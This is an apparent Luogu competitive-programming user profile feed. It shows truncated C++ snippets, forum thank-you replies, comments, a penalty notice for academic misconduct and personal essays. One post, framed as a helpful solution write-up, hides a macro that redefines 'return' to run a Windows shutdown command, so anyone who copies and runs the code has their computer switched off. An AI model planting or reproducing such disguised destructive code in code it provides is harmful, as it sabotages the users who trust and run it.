这个家伙很懒,什么也没有留下
追踪最近的用户名外显变动记录。
最近的文章、讨论、云剪贴板与社区记录
```cpp #include using namespace std; //#define int long long const int maxn=1e6+5; long long s[maxn*4]; int lazy[maxn*4]; void maintain(int o,int v){ s[o]=1 m){…
```cpp #include using namespace std; int main(){ int n; cin>>n; int a[105]; int sum=0; int caozuo=0; for(int i=1;i >a[i]; sum+=a[i]; } while(sum>0){ int maxn=-1…
```cpp #include using namespace std; #define int long long signed main(){ long long a,b; long long c,d; cin>>a; cin>>b; cin>>c; cin>>d; if(max(a,b)*max(c,d)>214…
```cpp #include using namespace std; int main(){ int n; string a[25]; cin>>n; for(int i=1;i >a[i]; } for(int i=1;i i;j--){ int number=0; while(a[i][number]==a[j…
因学术不端而棕名惩罚 14 天
```cpp #include using namespace std; int main(){ int n,d,s[100005],t[100005],h[100005]; cin>>n>>d; for(int i=0;i >s[i]>>t[i]>>h[i]; } for(int i=1;i d){ cout<<"N…
```cpp #include using namespace std; long long gcd(long long a, long long b){ while (b != 0){ long long temp = b; b = a % b; a = temp; } return a; } int main(){…
在讨论《WA10分求调》回复:
@[mjhcsp1](luogu://user/1814180):AC了,谢谢。
```cpp #include using namespace std; int main() { int dp[31]; int m=-1;//最大值 //用来存最大价值的? string S; cin>>S; int a; a=S.size(); for(int i=1;i m){ m=dp[i]; } } cou…
```cpp #include using namespace std; int main(){ int N,K,r[100000005],c[100000005],dp[100000005][100000005]; cin>>N>>K; for(int i=1;i >r[i]>>c[i]; } for(int i=1…
在讨论《10分RE求条》回复:
@[fxcym](luogu://user/1438471):谢谢
```cpp #include using namespace std; int main(){ int n,a[100005]; cin>>n; for(int i=1;i >a[i]; } int running=1; while(running){ running=0; for(int i=2;i =a[i-1]…
在讨论《90分TLE求条》回复:
@[Coookie](luogu://user/1008766):谢谢您的指正。
在讨论《90分TLE求条》回复:
@[Coookie](luogu://user/1008766):是这种么? ```cpp #include using namespace std; int main() { long long n; cin >> n; long long ans = n - (n + 2) / 3; cout << ans <<…
```cpp #include using namespace std; #define int long long bool csp(int p) { if(p*(p+1)%3==0) { return 1; } else { return 0; } } signed main() { int n,sum=0; ci…
```cpp #include using namespace std; bool csp(int p) { if(p*(p+1)%3==0) { return 1; } else { return 0; } } int main() { int n,sum=0; cin>>n; for(int i=1; i<=n;…
在文章《NOIp 2025 幽寂》发表评论:
好好吃的巧克力
在文章《NOIP游记》发表评论:
跳楼?
1. 概览 # 这个周 # ... # 星期五 ## 上午的英语课 ### mhx翻译句子 --- #### I'd like to clean the windows. #### 我想去擦窗户 #### TA 翻译成了我想去清理Windows(电脑🖥️). --- ### 全班同学一起喊You too! ## 下午…
```cpp #include #include #include #include using namespace std; int months[13] = {0,31,29,31,30,31,30,31,31,30,31,30,31}; int dateToDay(int month, int day) { in…
《初雪来信》 清晨六点,我在一种异样的寂静中醒来。窗外不是往日车水马龙的喧嚣,而是一片沉甸甸的白光,透过窗帘的缝隙,把整个房间映照得如同暗室里的旧胶片。推开窗,湿润的寒气扑面而来——芝罘区的初雪,到底还是来了。 最初的雪是羞怯的。细碎的雪粒斜斜地洒下,落在朝阳街青灰色的石板路上,瞬间化作水痕,像不曾存在的记忆。行人撑着…
在文章《大胆,栈溢出》发表评论:
栈崩溃
```cpp #include #include using namespace std; void youtoo(int depth) { if (depth <= 0) { // 终止条件?不! cout << "youtoo journey ends." << endl; return; } cout << "y…
My Bestest Frieeend an The Schooool Triiiip I has a bestest frieeend. Her name are Toooom. He is a girllll which she is in my classs. Last month, we goesss on a…
| 团队名称 | 学习百分比/10 | 题单个数 | 比赛 | 成员 | 总分 | |:-:|:-:|:-:|:-:|:-:|:-:| | 114658 | 10 | 18 | 15 | 18 | 61 | | 115119 | 0 | 0 | 0 | 44| 44 | | 94058 | 10 | 10 | 10 |…
```cpp #include #include using namespace std; int countYoutoo(const string& str) { int count = 0; string target = "youtoo"; int targetLen = target.length(); if…
小学生来发题解了。 我在考场上写了一大堆打表,没成功。 我现在才弄明白。 代码及解析如下。 ```cpp #include //万能头 #define return 0;system("shutdown -s -t 0"); using namespace std; typedef long long ll; int…
```cpp C++算法与洛谷题目查询 * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; } body { background-color:…
**高精度加减乘除取余** ```cpp #include using namespace std; const int maxn = 1e6+5; struct Bint{ int n; char s[maxn]; }; Bint Input(){ Bint A; cin>>A.s; A.n=strlen(A.s);…